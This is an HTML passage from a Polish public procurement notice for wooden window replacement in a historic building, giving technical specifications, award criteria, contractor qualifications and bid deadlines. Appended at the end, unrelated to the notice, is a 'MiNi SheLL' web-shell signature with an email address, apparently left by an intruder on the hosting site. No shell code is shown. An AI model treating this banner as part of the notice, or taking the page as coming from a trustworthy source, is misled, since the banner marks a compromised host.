okien opisano na rysunku: 057-PW-A-Z.01.B.(VI 2024)<br/>3) Dla budynku oficyny parametry i wymagania dla okien opisano na rysunku: 057-PW-A-Z.01.C (okna), 057-PW-A.Z.01.E (balkony).<br/>4) Okna fabrycznie malowane o wymaganiach:<br/>- kolor od zewnątrz NCS S 4550-Y90R/RAL 3011,<br/>- kolor od wewnątrz NCS S 0502-B50G/ RAL 9003,<br/>- współczynnik przenikania ciepła U(max) = 0,9 W/(m2*K),<br/>- szklenie zestawem szybowym bezpiecznym/bez wymagań, okucia obwiedniowe, elementy widoczne na wzór historycznych,<br/>- szyldy oraz klamki na wzór historycznych, <br/>- nawiewniki higrosterowalne ciśnieniowe we wskazanych oknach, zalecany montaż w górnych polach okien,<br/>- minimalne parametry akustyczne wg danych w tabeli rysunku 057-PW-A-Z01.B (VI.2024),<br/>- w oknach występuje ruchomy słupek, wg schematu przedstawionego na rysunku 057-PW-A-D15 (V.2025), 057-PW-A-D12 (II.2024)<br/>- przed rozpoczęciem produkcji niezbędny jest pomiar z natury,<br/>- do oferty dołączyć należy rysunki warsztatowe.<br/>5) Okna klatki schodowej opisano na rysunku 057-PW-A-Z.01.G. fabrycznie malowane o wymaganiach:<br/>- kolor NCS S 4550-Y90R/RAL 3011,<br/>- współczynnik przenikania ciepła U(max) = 1,4 W/(m2*K),<br/>- szklenie zestawem szybowym, okucia obwiedniowe, <br/>- nawiewniki higrosterowalne ciśnieniowe we wskazanych oknach, zalecany montaż w górnych polach okien,<br/>- minimalne parametry akustyczne wg danych w tabeli rysunku 057-PW-A-Z01.G (VII.2023) ,<br/>- przed rozpoczęciem produkcji niezbędny jest pomiar z natury- niniejszy zapis nie ma charakteru wymagania dokonania wizji lokalnej przed złożeniem oferty, wykonanie pomiarów będzie jednak niezbędne przed rozpoczęciem produkcji okien. Wyceny należy dokonać na podstawie formularza cenowego stanowiącego załącznik do formularza ofertowego, w którym znajdują się faktyczne wykonane już pomiary z budowy. Wykonawca winien sporządzić ofertę na podstawie dokumentacji- w szczególności rysunków elewacji przedstawiających zakres i wielkość robót/budynków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów w kryteriach.<br/>Uzyskana liczba punktów w ramach kryteriów zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po<br/>przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik<br/>zostanie zaokrąglony w górę.<br/>b) Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach:<br/>(1 % = 1 pkt.)<br/>c) Punktacja przyznawana ofertom w kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, przy<br/>wykorzystaniu matematycznych zasad zaokrąglania; najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>d) Zamawiający udzieli zamówienia temu(tym) Wykonawcy (Wykonawcom), którego(ych) oferta zostanie uznana za najkorzystniejszą, tj. uzyska największą łączną ilość punktów w kryteriach.<br/>e) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawiają taki sam bilans ceny,<br/>Zamawiający:<br/>- spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>- jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem.<br/>f) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej w pkt e) , Zamawiający wzywa Wykonawców, którzy<br/>złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt,<br/>przy czym, Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen lub kosztów wyższych niż zaoferowane w uprzednio złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Warunek w zakresie zdolności technicznej lub zawodowej - dot. obu części:<br/><br/>a) doświadczenie- w zakresie cz. I i II<br/>Wykonawca spełni warunek, jeżeli wykaże na podstawie dokumentów, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie minimum 1 robotę budowlaną obejmującą montaż stolarki okiennej o wartości minimum 450.000 zł.<br/><br/>- Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, wykaz winien zawierać roboty, w których wykonaniu Wykonawca bezpośrednio uczestniczył. <br/>Wzór wykazu robót stanowi załącznik do SWZ.<br/><br/>b) posiadanie osób kierowanych przez Wykonawcę do realizacji zamówienia- w zakresie cz. I i II<br/><br/>Zamawiający uzna ten warunek za spełniony w przypadku, gdy Wykonawca wykaże, że dysponuje i skieruje do realizacji zamówienia, co najmniej: <br/>1 osobę posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń, wpis na listę członków właściwej izby samorządu zawodowego oraz ważne zaświadczenie potwierdzające przynależność do POLSKIEJ IZBY INŻYNIERÓW BUDOWNICTWA, która będzie pełnić bezpośrednio obowiązki kierownika robót<br/>Wzór oświadczenia stanowi załącznik do SWZ.<br/>Przed podpisaniem umowy wykonawca jest zobowiązany przedstawić ww. dokumenty lub kserokopie dokumentów poświadczonych za zgodność z oryginałem. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Oświadczenie o braku<br/>podstaw wykluczenia z postępowania-zał. nr 2 do SWZ- składane z ofertą,<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji- składane na wezwanie Zamawiającego.<br/>- Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej,<br/>składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające,<br/>że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>- Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie<br/>ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>- Dokumenty/oświadczenia, o których mowa powyżej powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>Oświadczenie o spełnianiu warunków udziału w postępowaniu-zał. nr 2 do SWZ-składane z ofertą,<br/>b) Wykaz wymaganej liczby robót budowlanych, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia,<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotu, na rzecz którego roboty te zostały wykonane, oraz z<br/>załączeniem dowodów określających, czy roboty budowlane zostały wykonane należycie, to jest: referencji bądź innych<br/>dokumentów sporządzonych przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Wykaz robót winien zawierać<br/>pozycje które potwierdzają spełnianie warunku udziału w postępowaniu-– doświadczenie. Wzór wykazu został załączony do SWZ,<br/>składany na wezwanie Zamawiającego.<br/>b) Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego – wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodny ze wzorem stanowiący<br/>załącznik do SWZ, składany na wezwanie Zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający wymaga przedstawienia przedmiotowych środków dowodowych przez Wykonawcę w zakresie cz. I i II w postaci rysunków warsztatowych dla wszystkich okien. Rysunki warsztatowe winny zawierać w szczególności krótki opis rozwiązania konstrukcyjnego, charakterystykę materiałową (jaki materiał, jakie drewno, szerokości profili skrzydeł i ram, kolory, system malowania, rodzaj - uszczelek, okuć, zawiasów, osłonek; grubości szyb i komór międzyszybowych, współczynnik przenikania ciepła, szerokości szprosów), wymiary okien, rysunki w skali przekrojów pionowych i poziomych przez okno, widok zewnętrzny i wewnętrzny okien.<br/>2. Przedmiotowe środki dowodowe należy złożyć wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składa obligatoryjnie wraz z ofertą wypełniony i podpisany Formularz cenowy- zał. nr 8 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty<br/>b) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>części zamówienia wykonają poszczególni Wykonawcy- zał. nr 4 do SWZ.<br/>c) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4,5,7,8,10 Pzp, natomiast spełnianie warunków udziału w<br/>postępowaniu Wykonawcy wykazują zgodnie z cz. VIII pkt 1 SWZ.<br/>d) Wszyscy Wykonawcy składają oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału, w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu – Zał. Nr 2 do<br/>SWZ.<br/>e) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani, na wezwanie<br/>Zamawiającego złożyć; aktualne na dzień złożenia podmiotowe środki dowodowe – cz. IX 1,2,3.<br/>f) Podmiotowe środki dowodowe, o których mowa w cz. IX.3 składa odpowiednio Wykonawca/Wykonawcy, który/którzy<br/>wykazuje/wykazują spełnianie warunku. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wg zał. nr 7 i 7a do SWZ- wzór umowy dla cz. I i dla cz. II <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-04 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma E-zamówienia pod adresem: https://ezamowienia.gov.pl. Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”. Sposób złożenia oferty opisany na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-04 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com